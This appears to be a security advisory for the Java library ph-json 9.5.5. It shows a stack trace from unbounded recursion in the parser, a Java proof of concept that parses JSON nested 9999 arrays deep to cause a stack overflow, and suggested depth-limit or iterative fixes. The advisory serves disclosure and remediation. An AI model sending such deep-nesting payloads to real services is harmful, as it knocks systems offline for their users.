    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    
    

**PoC**

        <dependency\>
            <groupId\>com.helger</groupId\>
            <artifactId\>ph-json</artifactId\>
            <version\>9.5.5</version\>
        </dependency\>

import com.helger.json.serialize.JsonReader;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonReader.readFromString(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

Tag

#java